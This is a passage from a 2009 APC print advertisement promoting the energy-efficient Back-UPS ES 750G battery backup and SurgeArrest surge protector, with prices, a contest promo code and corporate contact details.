in this blog, if you're in the market for a 
workstation-class UPS, why not opt 
for the greener option?" 

- Heather Clancy, 
ZDNet.com 

In fact, while protecting your power 
supply, we're up to five times more 
energy efficient than any other solution. 
By saving you $40 per year in energy 
costs, our Back-UPS ES pays for itself in 
two short years. The high-frequency, low- 
copper design has a smaller transformer 
and environmental footprint. Even the 
packaging has been carefully selected 
and manufactured to maximize use of 
recycled materials and minimize waste. 

In this world, every decision you make 
counts. So protect your power with a 
battery backup that works to protect 
the environment. It conserves power, it 
pays for itself, and it's backed by APC's 
20-plus years of Legendary Reliability. 
For more information on this 
or our other great products, 
or for information about 
environmentally responsible 
disposal of your old battery, 
visit www.apc.com 




Energy-efficient solutions for 
every level of protection: 



Surge Protection

Starting at $34

Guaranteed protection from surges, spikes, and lightning.

7 outlets, Phone/Fax/Modem Protection, Master/Controlled Outlets

SurgeArrest P7GT

Back-UPS ES750G



Enter to Win a Back-UPS ES 750G!

Also, enter the key code to view other special offers and discounts.

Visit www.apc.com/promo Key Code n519w or Call 888-289-APCC x8253 or Fax 401-788-2797



Battery Back-UPS

Starting at $99

Our most energy-efficient backup for home computers.

10 outlets, DSL and Coax protection, Master/Controlled Outlets, High-Frequency Design, 70 minutes of runtime†



APC can help with your other power protection needs. Visit www.apc.com to see our complete line of innovative products.




Legendary Reliability* 



©2009 Schneider Electric. All Rights Reserved. Schneider Electric, APC, SmartShedding, Back-UPS, SurgeArrest, and Legendary Reliability are owned by Schneider Electric, or its affiliated companies in the United States and other countries. All other trademarks are property of their respective owners. e-mail: esupport@apc.com • 132 Fairgrounds Road, West Kingston, RI 02892 USA
*Average savings are based on comparable competitive models, and are comprised of two energy-saving features, an ultra-efficient electrical design, and the master/controlled outlets feature. †Runtimes may vary depending on load.



